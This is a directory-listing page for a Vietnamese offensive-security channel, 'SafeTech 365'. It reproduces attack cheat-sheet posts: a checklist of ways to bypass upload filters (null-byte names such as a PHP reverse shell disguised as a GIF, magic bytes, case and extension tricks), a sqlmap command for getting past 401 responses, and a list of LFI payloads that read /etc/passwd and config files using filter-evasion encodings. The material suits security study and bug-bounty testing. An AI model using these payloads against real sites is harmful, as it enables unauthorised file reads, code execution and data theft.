SafeTech 365

SafeTech 365 Contact information, map and directions, contact form, opening hours, services, ratings, photos, videos and announcements from SafeTech 365, TV Channel, .
(31)

**Chia sẻ Kiến Thức&Clip ATTT Miễn Phí **
**Học Tấn công để Phòng Thủ**
*Nơi chia sẻ DeepLink cho các DeepWeb đồng đạo không phân biệt xuất thân*
Offensive-security,Stay Safe

>>Youtube channel
+ Kênh Chính Thức
https://www.youtube.com/channel/UCb1HWzdFghgtSC6bzg7tPMw
+ Kênh Dự Phòng https://www.youtube.com/channel/UCoL-htuEL9Ump1_tglkUVig

 # Server-Side Prototype Pollution  #This contains a collection of Server-Side Prototype Pollution gadgets in Node.js co...
27/06/2023

# Server-Side Prototype Pollution #
This contains a collection of Server-Side Prototype Pollution gadgets in Node.js core code and 3rd party NPM packages.

 # Malicious File Upload Checklist # # Checklist- [ ]  { Try various file extensions } : Try different versions of the f...
18/05/2023

# Malicious File Upload Checklist

# # Checklist

- [ ] { Try various file extensions } : Try different versions of the file extensions, for example php3, .php4, .php5, phtml for PHP scripts, asp,aspx and ashx for IIS
**Extension Links** ➖ https://github.com/danielmiessler/SecLists
- [ ] { Append an extra file extension }: If The application is not properly validating for the file extension, this can be exploited by appending another extension, for example from script.php to script.php.gif or script.gif.php
- [ ] { Improper Implementation of Regex } : Check if regex only satisfying by including only extension name in filename anywhere like hellopng.php | Check if regex satisfying by including that extension in last like hello.php.asdfpng
- [ ] { Change the casing of the extension } : ExtensionTry different combinations of lower and upper case, for example pHp, PhP, phP, Php etc
- [ ] { Application allows to upload .svg file ? } : SVG images are just XML data. Using XML you can achieve lots of vulnerabilities, for instance a Stored XSS as below
- [ ] { Change content type } : When intercepting the request using Burp Suite, the content type can be changed, for example from “Content-type: application/x-php” to “Content-type: image/gif”
- [ ] { Add a magic byte to the file } : Magic bytes function as signatures used by the web server to identify the type of file that is being uploaded. For example, when adding “GIF87a” to the beginning of the script, the server will think of it as a GIF file.
Like : Change Filename=’1.php’ and filetype : image/gif And start the file content with GIF29a
- [ ] { Try reducing the file size } : If a file size restriction is being used, a smaller script can be uploaded to gain remote code ex*****on, such as :


💡 ,



- [ ] { Try using executable extensions } : Certain executable extensions may still be allowed, for example .phtml, .shtml, .asa, .cer”, “.asax”, “.swf”, or “.xap”.
- [ ] { Add a null byte to the file name } : If the site is using file extension whitelists, this can often be bypassed by adding %00 (HTML encoding) or \x00 (hex encoding) to the end of the file name. For example:

> php-reverse-shell.php%00.gif
>
- [ ] { Add special characters before file extension } : In order webservers, adding special characters such as ;%$& just after the file name, for example shell;.php can help bypass file extension whitelists
- [ ] { Insert EXIF data } : An executable script can be inserted into an image in the form of a metadata comment, which will then be executed when the web server uses the image in a page
- [ ] { Try using Windows 8.3 notation for the file name } : The Windows 8.3 short name version can be used in the file name. For example shell.aspx will become SHELL~1.ASP
- [ ] { Try finding characters that are converted to other useful characters during the file upload process. } : For instance, when running PHP on IIS, the “>”, “

If you find 401 Unauthorized, try to test with SQLmap sqlmap -u $url --forms --crawl=2 --dbs --ignore-code=401--->Bypass...
13/05/2023

If you find 401 Unauthorized, try to test with SQLmap
sqlmap -u $url --forms --crawl=2 --dbs --ignore-code=401
--->Bypassed
--->Bounty

Local File Inclusion (LFI) is one of the most common vulnerability in today's Web Applications having High to Critical s...
08/05/2023

Local File Inclusion (LFI) is one of the most common vulnerability in today's Web Applications having High to Critical severity.

1. Basic
/index.php?language=/etc/passwd (basic)
/index.php?language=../../../../etc/passwd (with path traversal)
/index.php?language=/../../../etc/passwd (with prefix)
/index.php?language=./languages/../../../../etc/passwd (with approved path)

2. WAF and Filters Evasion
(basic path traversal filter)
/index.php?language=....//....//....//....//etc/passwd

(url encoding filter)
/index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64

(path truncation filter)
/index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]

(null byte)
index.php?language=../../../../etc/passwd%00

(using php filter)
index.php?language=php://filter/read=convert.base64-encode/resource=config

(obfuscation techniques)
/fileRead.php?fileName=/etc/passwd (406📛)
/fileRead.php?fileName=/?tc/?asswd (200✅)
/fileRead.php?fileName=/??c/??sswd (200✅)
/fileRead.php?fileName=/???/p?s?wd
/fileRead.php?fileName=/???/???swd
/fileRead.php?fileName=/???/*swd
/fileRead.php?fileName=/???/*******swd

Address


Alerts

Be the first to know and let us send you an email when SafeTech 365 posts news and promotions. Your email address will not be used for any other purpose, and you can unsubscribe at any time.

Contact The Business

Send a message to SafeTech 365:

Videos

Shortcuts

  • Address
  • Telephone
  • Alerts
  • Contact The Business
  • Videos
  • Claim ownership or report listing
  • Want your business to be the top-listed Media Company?

Share